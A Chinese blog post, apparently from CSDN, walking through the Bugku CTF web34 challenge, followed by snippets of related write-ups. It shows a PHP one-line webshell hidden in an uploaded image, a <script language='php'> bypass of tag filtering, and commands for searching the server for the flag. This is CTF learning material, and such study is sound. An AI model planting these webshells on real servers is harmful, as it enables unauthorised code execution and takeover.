Bugku-WEB-web34

最新推荐文章于 2023-04-12 21:49:49 发布
最新推荐文章于 2023-04-12 21:49:49 发布
阅读量260 收藏
点赞数
分类专栏: web安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41209264/article/details/112256549
版权

进入题目,观察URL,显然存在文件包含。参考文件包含漏洞https://www.jianshu.com/p/3514f0fd79f7

考虑使用php伪协议读取源码

php://filter/read=convert.base64-encode/resource=需要读取的文件代码内容

应该是被过滤了,==

F12查看源码

提示有一个upload.php页面

是一个文件上传页面,加上存在文件包含,考虑使用图片马。

随便找一张图片,用记事本打开,写入一句话

上传成功后访问图片

发现一句话的两边<?php ?>被过滤了,使用<script language="php">eval($_POST['cmd']); </script>绕过

再次访问图片

一句话没有显示,应该是被当作php代码执行了

用菜刀连接

在根目录下找到flag

 

fallingskies22
关注
专栏目录
bugku-web-GET解析过程
weixin_46168073的博客
11-14 1139
一、启动场景 二、解题过程 点进去得到 可以看到这是一个if语句,判断条件为what=='flag'就会显示出echo 下的'flag",那我们直接在地址后面,写上?what=flag。 然后就得到了flag,直接复制粘贴到记事本,然后在复制粘贴到提交框。 点击提交。 ...
bugku-web-POST解析过程
weixin_46168073的博客
11-14 1483
一、启动场景 首先,老规矩,我们启动场景。 二、解题过程 这里看到和之前GET提交一样的东西,我们直接在后面输入和get一样的东西?what=flag,发现没用。 可见POST提交和GET提交的不一样。 然后我们下载hackbar工具。 这里我用的火狐。可以在github上下,也可以直接导包。2.1.3之前的免费,之后的收费。 这里百度网盘给个链接。 链接:https://pan.baidu.com/s/1FaVcS-zCaQEXs-FJM0BLCw 提取码:1234 ...
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku-web34
baidu_39504221的博客
12-23 627
看到这个第一反应是文件包含 尝试包含index.php 看看源码 这里有文件包含与文件上传两个漏洞的话,岂不是可以直接上传图片马然后解析? 写一个一句话试一下 GIF89a <?php phpinfo(); eval($_POST['test']); ?> 包含的时候发现<?php ?>一头一尾不见了,应该是被替换了 那我们可以这样写 <script language="php"> phpinfo(); @eval($_POST['test']); <.
Bugku CTF web34(Web
ChaoYue_miku的博客
03-17 258
0、打开网页,查看源代码 注意注释内容:upload.php 1、打开upload.php文件 文件上传,又是有关木马传入类型的题 2、构造一句话木马,查询flag文件 <script language=php>system("find / -name flag*");</script> 先创建文本文档,再修改扩展名为.jpg 3、上传一句话木马并打开 发现有关flag的储存路径信息 4、打开flag所在路径 5、得到flag:flag
Bugku web34 文件包含
weixin_44522540的博客
02-24 267
二十九、web34 文件包含 点进去查看源码: 发现upload.php,访问,可以上传图片 将以下代码写入记事本,后缀改为.jpg,上传 <script language=php>system("find / -name flag*");</script> 上传成功,访问上传的图片,看到/flag文件 访问/flag文件得到flag ...
Bugku_web31-34
ScyLamb的博客
01-05 511
0x01 web31 扫描得robots.txt,访问得resusl.php 关键代码:if ($_GET[x]==$password) 此处省略1w字 这里被坑了,试了好久,还以为有啥其他新姿势,密码居然是admin! payload:/resusl.php?x=admin 0x02 web32 没上传成功,看评论区才成功 payload: ①大写绕过请求头中的Content-Type: Multipart ②修改请求报文中的Content-Type: image/png ③修改 后缀名php4 原因
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
Bugku-web之成绩查询
weixin_42939822的博客
03-14 3501
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
bugku-web-滑稽
weixin_46168073的博客
11-11 1630
Bugku-web-滑稽解析过程。 一、启动场景 首先,我们启动场景。(点击启动)。 选择OK,注册bugku会送金币,不用担心。 百度bugku就行 二、进入环境 然后我们进入环境。 点击超链接进入环境。 三、做题思路 可以看到是一堆滑稽,而且会越来越快的出现。做为一个新手,我们直接按F12,检查HTML代码。 可以看到flag就藏在其中。 复制flag,<!--flag{73a8b9807007d4d0cbead418e02add9...
BugKu-web篇-web34
jiuyongpinyin的博客
06-02 120
web34 首先查看源码,发现upload.php 进入上传界面 进过测试,发现对于文件类型及文件后缀都有过滤,并且过滤了 < 和 ? ,所以使用bp改包 成功后使用蚁剑连接 在根目录下找到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
ctfshow-命令执行-web34
weixin_43400535的博客
11-02 541
ctfshow-web34 文章目录ctfshow-web34题目描述:原理:审计:二、使用步骤1.引入库2.读入数据总结 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 04:21:29 # @email: h1xa@ctfer.co
Ctfshow web入门-web34 WP
qq_45427131的博客
05-17 302
web34的套路和web33一样,解题姿势也一样,当然也可以换一种解法,比如说日志包含、文件包含、data协议命令执行 日志包含解法: 首先查看preg_match函数过滤的参数 还是老套路,过滤括号,那么只能用不带括号的函数include了,include $_POST[a] 分号被过滤之后可以用?>代替 尝试包含日志 日志包含成功,接下来就是往日志写马了 用firefox访问然后burpsuite抓包,然后再user-agent里面输入一句话木马<?php eval($_POST[a])
JavaWeb(35) : 在Web(34)基础上增加分页功能
HuashirenYty的博客
09-04 452
一、分页的原理 第N页/共M页 首页 上一页 1 2 3 4 5 6 7 8 9 10 下一页 尾页 分页的优点:只查询一页,不用查询所有页! 二、分页数据 页面的数据都是由Servlet传递来的! Servlet: 当前面:pageCode,pc;pc:如果页面没有传递当前页码,那么Servlet默认是第一页,或者按页面传递的来准! 总页数:totalPages,tp;tp:总记录...
CTFshow web入门 web28~web40 命令执行
qq_56815564的博客
04-12 591
这里可以使用的是data伪协议 data://text/plain,这个相当于执行了php语句,后面跟上的 “.php” 因为前面的php语句已经闭合了,所以后面跟上的 “.php” 会被当成html页面直接显示在页面上,起不到什么作用。很明显,flag应该就在flag.php里,但不能直接访问flag.php 因为不能直接输入字符flag,被过滤了。而filter协议和php://input如果要传的话,必须出现具体的文件名,而flag被过滤了,所以不能用。另外这里的eval($c);
BugKu逆向之12-马老师杀毒卫士
ACGeny的博客
09-24 1154
BugKu逆向之12-马老师杀毒卫士一、文件描述二、解题思路 BugKu原程序马老师杀毒卫士.exe 一、文件描述 运行界面如下 还会出现奇怪的音乐,,,嘎嘎,,你每个选项都点一下,,发现它是在扫描你的硬盘,然后产生误报提示,,反正就是没啥有用的信息~~~ 二、解题思路 32位IDA Pro中打开,exports只有一个start函数,进入start主函数中,没有发现啥有用的信息 再打开Strings窗口,我们来检索下flag,或者ctf相关字段,,, 然后我在检索“}”的时候发现了一个奇怪的
Bugku,Reverse:马老师杀毒卫士
Pai_Space
01-14 680
扫描后32位 搜索字符,发现散乱的 flag,栅栏密码解决 得到 flag flag{ma_bao_guo_nb!}
bugku web34 hint:文件包含
濯君
12-30 599
首先打开实验场景,发现什么也没有 查看源码,发现upload.php 进入该上传页面 <script language=php>system("find / -name flag*");</script> 将上面的代码写入文本,文本名修改为2.jpg 将2.jpg上传到服务器 浏览器访问URL http://114.67.246.176:17269/index.php?file=upload/202012301028412794.jpg 找到/flag,访问URL h.
bugku reverse 马保国安全卫士
weixin_46578840的博客
06-10 230
下载解压,得到exe,随便点点,无用。 IDA32位打开直接f5,打开string windows 搜索一下flag没有,但是拉到中间看到一串拥有flag特征的字符串 应该是移位了,用栅栏密码改一下,移三位即可得到flag
bugku s1 awd排位赛-12
最新发布
08-07
bugku s1 awd排位赛-12是Bugku安全平台上举办的一场AWD(Attack and Defense)排位赛的第12轮比赛。Bugku是一个致力于网络安全技术研究和交流的平台,这场比赛的目的是为了检验参赛者在攻击和防御方面的技术实力。 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值